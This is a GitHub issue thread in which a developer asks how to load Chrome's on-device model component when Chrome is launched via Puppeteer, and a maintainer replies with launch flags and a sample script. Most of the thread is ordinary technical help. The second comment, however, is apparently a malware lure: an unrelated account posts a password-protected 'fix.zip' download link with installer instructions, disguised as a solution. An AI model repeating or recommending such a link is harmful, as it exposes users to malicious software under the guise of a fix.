### ISSUE TITLE
[Feature]: Loading Chrome components

### ISSUE THREAD

**Issue by gyagp** [puppeteer/puppeteer#13011]
### Feature description

I hope to use Puppeteer to test Gemini Nano integration with Chrome. Gemini relies a component called "Optimization Guide On Device Model". However, after I start the browser using Puppeteer, I couldn't find any components. 

Expected components
![Screenshot 2024-08-28 151008](https://github.com/user-attachments/assets/e2eab9cf-1be0-4db8-839c-87f0fa886ce7)

Current behavior
![Screenshot 2024-08-28 151229](https://github.com/user-attachments/assets/085cfb6f-3ed9-40ce-a29e-69bed19ab53a)

Does Puppeteer support loading the Chrome components?

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OrKoN** [comment]
Puppeteer currently disables component updates (see https://github.com/puppeteer/puppeteer/issues/13010). If you want to enable component updates, use `ignoreDefaultArgs: ['--disable-component-update']` when launching the browser. We will stop using --disable-component-update after M130 by default but the component updates will be still disabled in Chrome for Testing. Only bundled components will be initialized.

**Comment by gyagp** [comment]
Thanks for the quick reply! 
With "ignoreDefaultArgs: ['--disable-component-update']", I can see the components. However, the required component, Optimization Guide on Device Model, is not listed. This component is downloaded after I put "await ai.assistant.create();" in the console.
Is there any way to load this component?

**Comment by OrKoN** [comment]
@gyagp are you running regular Chrome or Chrome for Testing that is bundled with Puppeteer?

**Comment by OrKoN** [comment]
if it is downloaded after running "await ai.assistant.create();", you should be able to run this snippet using Puppeteer to download the component (via the page.evaluate() API).

**Comment by gyagp** [comment]
I'm using regular Chrome (Chrome Canary released by Google). If I start Chrome normally (not via Puppeteer), I see 25 components. But if I start Chrome via Puppeteer, I could only see 23 components, while the missing ones are: Optimization Guide On Device Model (required in my case) and Optimization Hints. Details are attached below.

[Start Chrome in a normal way]
<img width="257" alt="image" src="https://github.com/user-attachments/assets/dfb6b742-d0ee-4bf3-9494-edabbabc1093">


[Start Chrome via Puppeteer]
![image](https://github.com/user-attachments/assets/434a1204-8c35-418a-b5f9-c79c7d598b13)

**Comment by gyagp** [comment]
BTW, await page.evaluate() doesn't work in this case. "await ai.assistant.create();" just returns quickly with error ("Uncaught InvalidStateError: The session cannot be created."), but it does trigger model download in the background if we start browser in a normal way. I just tried with Puppteer, but it didn't trigger any downloads (Maybe the browser thinks model is already there).

**Comment by OrKoN** [comment]
It seems you need to trigger the component update each time and wait until it's updated?

```
import puppeteer from "puppeteer";

const browser = await puppeteer.launch({
  executablePath: '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary',
  ignoreDefaultArgs: true,
  args: ['--enable-features=\'EnableAIPromptAPI,OptimizationGuideOnDeviceModel:compatible_on_device_performance_classes/*\'', '--no-first-run', '--user-data-dir=/tmp/test', '--disable-fieldtrial-config'],
  headless: false,
  defaultViewport: null,
});

const page = await browser.newPage();
await page.goto('chrome://components');

await page.evaluate(async () => {
  try {
    await ai.assistant.create();
  } catch (err) {
    console.log(err)
  }
});
```

this makes the component show up, then after clicking update and refreshing the components page, after the component finished updating, I get ai.assistant.create to work. You could probably automate it via the chrome://components page.

Would you mind filing an issue for the Prompt API here https://issues.chromium.org/u/1/issues/new?component=1583624&template=0 ? Maybe a better workflow is possible.
